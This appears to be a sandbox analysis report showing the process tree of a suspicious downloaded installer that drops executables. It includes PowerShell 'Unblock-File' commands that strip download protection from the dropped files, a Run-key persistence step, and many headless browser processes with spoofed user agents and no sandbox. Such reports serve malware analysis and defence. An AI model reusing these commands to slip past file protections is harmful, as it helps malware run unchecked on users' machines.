C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6756 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1044
-
-
level 1 | PID:2080 | C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding

level 1 | PID:4116 | C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding

level 1 | PID:1228 | C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding

level 1 | PID:400 | C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
level 1 | PID:896 | C:\Users\Admin\Downloads\the-longing-codex_Dc3biRCmpz\the-longing-codex_Dc3biRCmpz.exe
    "C:\Users\Admin\Downloads\the-longing-codex_Dc3biRCmpz\the-longing-codex_Dc3biRCmpz.exe"

level 2 | PID:2336 | C:\Users\Admin\AppData\Local\Temp\is-REFNL.tmp\is-N2EH9.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-REFNL.tmp\is-N2EH9.tmp" /SL4 $C005C "C:\Users\Admin\Downloads\the-longing-codex_Dc3biRCmpz\the-longing-codex_Dc3biRCmpz.exe" 6641876 52224
    - Executes dropped EXE
    - Loads dropped DLL

level 3 | PID:3600 | C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Delete /F /TN "bom_mix_pro_11151"

level 3 | PID:1460 | C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
    "C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe" 4fecda2203fc69f059d80fe67d1b6add
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
level 4 | C:\Windows\SysWOW64\WerFault.exe (35 instances, each tagged "Program crash", all reporting crashes of PID 1460)
    C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s <N>, with -s value and PID per instance:
    -s 852   PID:2628
    -s 860   PID:2080
    -s 892   PID:3860
    -s 1064  PID:2560
    -s 1084  PID:1040
    -s 1056  PID:4372
    -s 1124  PID:2808
    -s 1152  PID:1172
    -s 1132  PID:1232
    -s 1116  PID:2672
    -s 888   PID:4616
    -s 1580  PID:2148
    -s 1108  PID:888
    -s 1336  PID:4776
    -s 1696  PID:2076
    -s 1244  PID:3416
    -s 1920  PID:3612
    -s 1888  PID:4896
    -s 1900  PID:2752
    -s 1356  PID:2676
    -s 2008  PID:4176
    -s 1916  PID:4680
    -s 896   PID:768
    -s 1840  PID:3564
    -s 1108  PID:2640
    -s 2064  PID:4784
    -s 2084  PID:2656
    -s 1644  PID:2152
    -s 2092  PID:3940
    -s 2072  PID:2072
    -s 2096  PID:1404
    -s 2152  PID:2412
    -s 2132  PID:908
    -s 2112  PID:4644
    -s 2148  PID:3324
level 4 | PID:1112 | C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\tFkRz28C\GtBtte.exe"

level 5 | PID:1172 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\tFkRz28C\GtBtte.exe"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

level 4 | PID:5108 | C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exe"
    - System Location Discovery: System Language Discovery

level 5 | PID:4216 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exe"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

level 4 | PID:3120 | C:\Users\Admin\AppData\Local\Temp\tFkRz28C\GtBtte.exe
    C:\Users\Admin\AppData\Local\Temp\tFkRz28C\GtBtte.exe /sid=3 /pid=224
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
level 5 | PID:4876 | C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application

level 6 | PID:424 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Modifies Control Panel
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

level 7 | PID:4372 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2844 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

level 7 | PID:2752 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2980 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken

level 7 | PID:1560 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2984 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
level 7 | PID:2848 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3156 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

level 8 | PID:4860 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
    - Executes dropped EXE
    - Drops file in Windows directory
    - Modifies Control Panel
    - Suspicious behavior: EnumeratesProcesses

level 9 | PID:4732 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2784 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
    - Executes dropped EXE

level 9 | PID:4544 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2920 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
    - Executes dropped EXE

level 9 | PID:5528 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2948 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery

level 9 | PID:5692 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3124 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - Executes dropped EXE

level 9 | PID:444 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - Executes dropped EXE
level 10 | PID:5548 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
    - Executes dropped EXE
    - Modifies Control Panel

level 11 | PID:4220 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Modifies Control Panel

level 12 | PID:5348 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2812 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
    - Executes dropped EXE

level 12 | PID:5160 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery

level 12 | PID:1628 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
    - Executes dropped EXE

level 12 | PID:764 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - Executes dropped EXE

level 12 | PID:5848 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery

level 12 | PID:4888 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4052 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery

level 12 | PID:2328 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1204 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery

level 12 | PID:2708 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3992 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery

level 12 | PID:2292 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3840 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

level 12 | PID:1444 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3960 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

level 12 | PID:5568 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5192 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
    - System Location Discovery: System Language Discovery

level 12 | PID:1512 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=6052 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

level 12 | PID:2756 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4696 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
-
-
[depth 12] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 4608)
  command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
  behaviour: Drops file in Windows directory; Modifies Control Panel

  [depth 13] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 1444)
    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2900 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
    behaviour: System Location Discovery: System Language Discovery

  [depth 13] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5208)
    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

  [depth 13] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 908)
    command line: "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

  [depth 13] C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe (PID 5500)
